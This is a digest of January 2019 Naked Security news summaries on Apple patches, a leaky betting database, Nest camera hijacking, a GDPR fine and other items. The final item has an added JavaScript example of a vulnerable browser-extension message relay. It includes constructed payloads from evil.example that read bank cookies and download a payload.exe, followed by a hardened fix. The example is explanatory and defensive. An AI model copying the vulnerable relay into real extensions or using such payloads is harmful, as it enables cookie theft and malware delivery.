January 24, 2019
Update now! Apple releases first 2019 iOS and macOS patches
By John E Dunn
Apple has issued its January security updates fixing a list of mostly shared CVE flaws affecting iOS and macOS with a smattering for Safari, watchOS, tvOS, and iCloud for Windows.
iOS v12.1.3
This latest version fixes a sizable list of CVEs for the iPhone 5s and later, the iPad Air and later, and the iPod touch 6th generation. Almost all were reported to Apple by external researchers.
Among the interesting ones is CVE-2019-6200, a Bluetooth flaw that could give an attacker in a privileged network position remote code execution (RCE), and CVE-2019-6224, another RCE bug that a remote attacker could trigger simply by initiating a FaceTime call.
Fixes for the WebKit browser engine make up another nine CVEs, including CVE-2019-6229 which might allow cross-site scripting through a malicious web page.
Kernel-level flaws account for six CVEs, all of which would let an attacker who managed to get a malicious app past Apple's review elevate privileges, break out of the sandbox, or execute arbitrary code with kernel privileges.
The update should appear without intervention, or you can check manually by tapping Settings > General > Software Update.
Read more at https://nakedsecurity.sophos.com/2019/01/24/update-now-apple-releases-first-2019-ios-and-macos-patches/
“Proceed with caution”: Microsoft browser says Mail Online is untrustworthy
By Lisa Vaas
As legislators and the public have bludgeoned them with complaints about how they’ve let fake news melt democracy, tech big boys such as Microsoft and Facebook have said hey, that ain’t our thing – we’ll get fact-checkers to take this slapping for us.
Bring it on, said one of those fact-checking services. The buck stops right here, said third-party startup NewsGuard, after it glued an “untrustworthy” badge onto the Daily Mail’s journalism, which includes the Mail on Sunday and Mail Online.
As part of Microsoft’s attempt to stop the spread of malarkey, the company has preinstalled NewsGuard’s messages into its Microsoft Edge browser on Android and iOS. Thus, as of this week, Edge users are seeing messages saying that Mail Online rates a one out of five for credibility: “the same level as the Kremlin-backed RT news service,” as The Guardian reports.
The Daily Mail is a UK tabloid that’s second only to The Sun for daily newspaper readership. It, along with its online outlets, has been rated by NewsGuard as “generally fail[ing] to maintain basic standards of accuracy and accountability.”
According to The Guardian (which, according to PC Mag, NewsGuard has rated as trustworthy), Microsoft Edge users who visit Mail Online will now see a small shield icon in the URL bar at the top of the screen. It asserts that the website…
…generally fails to maintain basic standards of accuracy and accountability… [and] has been forced to pay damages in numerous high-profile cases.
Readers should tread with caution, NewsGuard says, given that…
…the site regularly publishes content that has damaged reputations, caused widespread alarm, or constituted harassment or invasion of privacy.
NewsGuard is also warning that the Daily Mail sites fail to “handle the difference between news and opinion responsibly” and fail to reveal “who’s in charge, including any possible conflicts of interest.”
Read more at https://nakedsecurity.sophos.com/2019/01/24/proceed-with-caution-microsoft-browser-says-mail-online-is-untrustworthy/
100 million online bets exposed by leaky database
By John E Dunn
Yet another organization has been spotted copying important data into an internet-facing Elasticsearch server without putting any authentication in front of it. Elasticsearch is a search and analytics database, not a storage service, and out of the box it has no access control, so anyone who can reach port 9200 can query every index.
Last week, it was US company VOIPo that accidentally exposed call logs, SMS data, and company credentials in Elasticsearch where it was spotted by researcher Justin Paine.
This week, Paine has returned to tell ZDNet of a second cache of Elasticsearch data he found only days ago that appears to have been connected to online betting sites.
The records held sensitive personal data including:
Real names, home addresses, phone numbers, email addresses, birth dates, site usernames, account balances, IP addresses, browser and OS details, last login information, and a list of played games.
In addition, Paine found 108 million records connected to online bets, deposits, wins and withdrawals, complete with partially redacted payment card data.
According to ZDNet, the betting domains included kahunacasino.com, azur-casino.com, easybet.com, and viproomcasino.net, connected to companies registered in Cyprus and the Caribbean.
Read more at https://nakedsecurity.sophos.com/2019/01/23/100-million-online-bets-exposed-by-leaky-database/
PewDiePie-spammers and whale-flingers exploit hole in Atlas game
By Lisa Vaas
The newly launched Atlas game has pirates, a fountain of youth, ramshackle sloops, naval battles, submarines, and guillotines.
What Grapeshot Games’s MMO (Massively Multiplayer Online) game is not supposed to have: a flood of whales, spawning in water, on land and sometimes in mid-air.
That, however, is what happened after multiple players found and exploited a vulnerability in the Atlas game itself. On Sunday, an assistant community manager wrote on the Atlas community forum that the game maker had to do “emergency maintenance” at 09:00 UTC, rolling back the game and wiping out players’ gains in the five and a half hours since the exploit enabled the infliction of whales.
Multiple accounts were eventually banned. But before the game admins had a chance to close the hole, the whale-flingers got bored and they, and/or others, started flooding the servers with dragons… after which some players exploited the vulnerability by spamming players to exhort them to subscribe to PewDiePie… for hours.
Read more at https://nakedsecurity.sophos.com/2019/01/23/pewdiepie-spammers-and-whale-flingers-exploit-hole-in-atlas-game/
Google fined $57m for data protection violations
By Danny Bradbury
In a landmark ruling, France’s data protection commissioner has fined Google €50m (around $57m) for violating Europe’s General Data Protection Regulation (GDPR). The fines penalize the search and advertising giant for not giving information to users or obtaining valid consent when gathering data to personalize advertisements.
The fines are the result of an investigation into Google lasting almost eight months. It began when advocacy group None of Your Business (NOYB) filed a complaint against Google with data protection regulators in Austria, Belgium, Germany and France last May, shortly after GDPR came into force. The French regulator also received a similar complaint from French digital rights advocacy group La Quadrature du Net (LQDN).
France’s regulator, the Commission Nationale de l’Informatique et des Libertés (CNIL), announced on Monday that it agreed with the complaints, finding that Google “excessively” spread privacy information across several places during the Google account creation process.
This information includes what the data would be used for, how long it would be stored, and the types of personal data used to personalize ads. This made it hard for users to discover this information, the CNIL ruling says:
The relevant information is accessible after several steps only, implying sometimes up to 5 or 6 actions. For instance, this is the case when a user wants to have complete information on his or her data collected for the personalization purposes or for the geo-tracking service.
Even when users do find that information, it is often vague, the CNIL adds. There are so many services collecting so much data that it is difficult for users to understand everything that their data will be used for.
Read more at https://nakedsecurity.sophos.com/2019/01/23/france-fines-google-57m-under-gdpr/
Hijacked Nest cam broadcasts bogus warning about incoming missiles
By Lisa Vaas
A hacker took over a Nest security camera to broadcast a fake warning about three incoming intercontinental ballistic missiles (ICBMs) launched from North Korea, sending a family into “five minutes of sheer terror.”
Laura Lyons, of Orinda, California, told the Mercury News that she was preparing food in her kitchen on Sunday when a “loud squawking – similar to the beginning of an emergency broadcast alert” blasted from the living room, followed by a detailed warning about missiles headed to Los Angeles, Chicago and Ohio.
The newspaper quotes her:
It warned that the United States had retaliated against Pyongyang and that people in the affected areas had three hours to evacuate. It sounded completely legit, and it was loud and got our attention right off the bat… It was five minutes of sheer terror and another 30 minutes trying to figure out what was going on.
Her frightened 8-year-old son crawled under the rug while Lyons and her husband looked at the TV in confusion: why was the station airing the NFC Championship football game, instead of an emergency broadcast?
The couple eventually realized that the warning was coming from their Nest security camera, perched on top of the TV. After multiple calls to 911 – the US emergency number – and to Nest, they eventually figured out that they’d been the victims of a prank. A Nest supervisor told them on Sunday that they’d likely been victims of a “third-party data breach” – in other words, a Nest password that had been exposed in a breach of some other service and reused, which is what gave the webcam hijacker access to the Nest camera and its speakers.
Read more at https://nakedsecurity.sophos.com/2019/01/23/hijacked-nest-cam-broadcasts-bogus-warning-about-incoming-missiles/
Rogue websites can turn vulnerable browser extensions into back doors
By John E Dunn
When was the last time you checked the permissions asked for by a browser add-on?
It’s a blind spot: we might know that app permissions can be risky but when it comes to extensions for browsers such as Chrome and Firefox there is a tendency to worry about it only when someone discovers a malicious extension doing something it shouldn’t.
But it’s not only malicious extensions that can be a problem, as highlighted by a newly published study by Université Côte d’Azur researcher, Dolière Francis Somé, which analyses deeper-level APIs.
Extensions can do things that websites can’t. Websites are constrained by the Same Origin Policy (SOP), the layer that stops a page on one origin from reading data belonging to another.
Somé was interested in whether a rogue website could bypass those SOP protections by exploiting privileged browser extensions – getting an extension to hand over user data, browsing history or credentials, or to download files onto the user’s device, on the page’s behalf.
Sure enough, after analyzing 78,315 Chrome, Firefox and Opera extensions that used the WebExtensions API using a mixture of static analysis and manual review, the answer in 197 cases was yes, it could.
All told, 171 of the 197 were Chrome extensions, which reflects the much greater number of extensions available for that browser rather than any inherent security advantage of Firefox and Opera, which accounted for 16 and 10 respectively.
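The weakness the study describes usually looks like this: a content script relays whatever a web page posts via window.postMessage to the extension’s background script, whose message handler then calls privileged WebExtensions APIs. The following is an added example, not code from the article or from Somé’s study: it models that relay-and-dispatch pattern with a fake API object standing in for browser.cookies, browser.downloads and browser.history, then shows a hardened version with an origin allowlist on both sides. The origins, payloads and the ALLOWED table are all constructed for illustration.

```javascript
// Added example, not code from the article or the study it describes.
// Constructed stand-in for privileged extension APIs (browser.cookies,
// browser.downloads, browser.history). It records every call so the caller can
// see exactly what a web page managed to reach through the extension.
function makePrivilegedApis() {
  const log = [];
  return {
    log,
    cookies: {
      getAll(filter) { log.push(`cookies.getAll ${filter.domain}`); return [{ name: 'sid', value: 'secret' }]; },
    },
    downloads: {
      download(opts) { log.push(`downloads.download ${opts.url}`); return 1; },
    },
    history: {
      search(q) { log.push(`history.search ${q.text}`); return [{ url: 'https://bank.example/' }]; },
    },
  };
}

// Content-script side, vulnerable: forwards any message the page posts.
// In a real extension this would be browser.runtime.sendMessage(event.data);
// here sendMessage is injected so the flow can run outside a browser.
function vulnerableRelay(event, sendMessage) {
  return sendMessage(event.data);
}

// Background side, vulnerable: dynamic dispatch on attacker-controlled strings,
// so the page can name any API the extension holds a permission for.
function vulnerableHandler(apis) {
  return (msg, sender) => {
    const [api, method] = String(msg.call).split('.');
    return apis[api][method](msg.args);
  };
}

// Hardened. Two independent checks, because each side can be bypassed alone:
// the content script checks event.origin (messages can arrive from iframes or
// an opener, not just the top-level page) and the background checks sender.url,
// which the browser fills in and the page cannot forge.
const ALLOWED = new Map([
  ['https://app.example', new Set(['history.search'])], // constructed allowlist
]);

function hardenedRelay(event, sendMessage) {
  if (!ALLOWED.has(event.origin)) return { error: 'origin not allowed' };
  return sendMessage(event.data);
}

function hardenedHandler(apis) {
  return (msg, sender) => {
    const origin = new URL(sender.url).origin;
    const permitted = ALLOWED.get(origin);
    if (!permitted || !permitted.has(msg.call)) return { error: 'forbidden' };
    // No dynamic dispatch: only the narrow operation the site needs, with
    // bounded arguments, so the extension cannot be steered to other APIs.
    if (msg.call === 'history.search') {
      const text = String((msg.args && msg.args.text) || '').slice(0, 100);
      return apis.history.search({ text, maxResults: 10 });
    }
    return { error: 'forbidden' };
  };
}

// Drives messages from a page at pageOrigin through a relay and a handler.
function run(relay, handlerFactory, pageOrigin, payloads) {
  const apis = makePrivilegedApis();
  const handler = handlerFactory(apis);
  const sender = { id: 'abc', url: `${pageOrigin}/index.html`, tab: { id: 1 } }; // constructed
  const responses = payloads.map((data) =>
    relay({ origin: pageOrigin, data }, (m) => handler(m, sender)));
  return { responses, reached: apis.log };
}

// Constructed payloads a lure page at https://evil.example might post.
const ATTACK = [
  { call: 'cookies.getAll', args: { domain: 'bank.example' } },
  { call: 'downloads.download', args: { url: 'https://evil.example/payload.exe' } },
  { call: 'history.search', args: { text: 'bank' } },
];

function demo() {
  return {
    vulnerable: run(vulnerableRelay, vulnerableHandler, 'https://evil.example', ATTACK),
    hardened: run(hardenedRelay, hardenedHandler, 'https://evil.example', ATTACK),
    backgroundOnly: run(vulnerableRelay, hardenedHandler, 'https://evil.example', ATTACK),
    legit: run(hardenedRelay, hardenedHandler, 'https://app.example', [ATTACK[2]]),
  };
}
```

In a real extension the relay sits in a `window.addEventListener('message', ...)` handler in the content script and the background handler in `browser.runtime.onMessage.addListener`; the `backgroundOnly` case shows that the sender.url check alone already stops the attack even if someone later loosens the content script. Chrome extensions that talk to pages directly through `runtime.onMessageExternal` should additionally restrict the `externally_connectable` key in the manifest to the sites that need it.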
Read more at https://nakedsecurity.sophos.com/2019/01/22/rogue-websites-can-turn-vulnerable-browser-extensions-into-back-doors/